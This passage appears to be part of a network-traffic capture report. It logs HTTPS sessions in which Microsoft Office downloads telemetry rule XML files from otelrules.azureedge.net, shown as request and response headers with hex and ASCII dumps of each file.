                                                                                                                                                                                  2024-11-23 18:53:21 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  135192.168.2.74992813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:21 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:21 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                  x-ms-request-id: 1a99a412-f01e-0099-613c-3c9171000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185321Z-174c587ffdfmlsmvhC1TEBvyks00000003e000000000fkyk
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:21 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  136192.168.2.74993113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:21 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:21 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1399
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE976026E"
                                                                                                                                                                                  x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185321Z-178bfbc474bfw4gbhC1NYCunf400000004w00000000096za
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:21 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  137192.168.2.74992913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:21 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:21 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:21 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1403
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                  ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                  x-ms-request-id: d029e12f-101e-00a2-1e39-3c9f2e000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185321Z-178bfbc474bv7whqhC1NYC1fg400000004x00000000074fq
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:21 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  138192.168.2.74993913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:23 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1425
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                  x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185323Z-178bfbc474bxkclvhC1NYC69g400000004r000000000hf0z
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:23 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  139192.168.2.74993813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:23 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                  x-ms-request-id: 5431248a-601e-005c-155d-3df06f000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185323Z-174c587ffdftv9hphC1TEBm29w000000034000000000u37n
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:23 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  140192.168.2.74993713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:23 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1388
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                  x-ms-request-id: ce856bd5-501e-007b-6157-3c5ba2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185323Z-15b8b599d88tmlzshC1TEB4xpn00000003b0000000000kx4
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:23 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  141192.168.2.74993613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:23 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:23 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                  x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185323Z-178bfbc474btvfdfhC1NYCa2en00000004yg000000008ana
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:23 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  142192.168.2.74994013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:23 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:24 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:23 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1378
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                  ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                  x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185323Z-178bfbc474bfw4gbhC1NYCunf400000004z000000000161q
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:24 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  143192.168.2.74994713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:25 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 18:53:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 18:53:26 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 1368
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                  ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                  x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T185326Z-178bfbc474bq2pr7hC1NYCkfgg00000004y000000000et4p
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 18:53:26 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  144192.168.2.74994813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 18:53:25 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
